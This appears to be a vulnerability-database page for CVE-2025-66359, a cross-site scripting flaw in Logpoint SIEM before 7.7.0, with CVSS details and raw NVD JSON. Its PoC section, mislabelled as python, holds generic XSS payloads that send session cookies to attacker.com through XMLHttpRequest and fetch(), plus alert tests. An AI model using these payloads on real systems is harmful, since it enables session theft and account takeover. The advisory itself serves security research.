Security Vulnerability Report
中文
CVE-2025-66359 CVSS 8.5 HIGH

CVE-2025-66359

Published: 2025-11-28 00:15:46
Last Modified: 2025-12-03 19:08:51

Description

An issue was discovered in Logpoint before 7.7.0. Insufficient input validation and a lack of output escaping in multiple components leads to a cross-site scripting (XSS) vulnerability.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:* - VULNERABLE
Logpoint < 7.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-66359 Logpoint XSS PoC --> <!-- 恶意脚本注入payload --> <script> // 获取当前用户会话Cookie var cookies = document.cookie; // 创建窃取数据的请求 var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookies), true); xhr.send(); // 或者弹窗测试漏洞 alert('XSS漏洞测试成功 - CVE-2025-66359'); </script> <!-- 简化的XSS payload --> <img src=x onerror="alert(document.domain)"> <!-- 存储型XSS payload --> <svg/onload=fetch('https://attacker.com/log?data='+document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66359", "sourceIdentifier": "[email protected]", "published": "2025-11-28T00:15:46.003", "lastModified": "2025-12-03T19:08:50.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Logpoint before 7.7.0. Insufficient input validation and a lack of output escaping in multiple components leads to a cross-site scripting (XSS) vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.7.0", "matchCriteriaId": "D6A6E475-FAB2-42A4-9805-F137CDBDEB61"}]}]}], "references": [{"url": "https://servicedesk.logpoint.com/hc/en-us/articles/29158899698333-XSS-Vulnerability-due-to-insufficient-input-validation", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}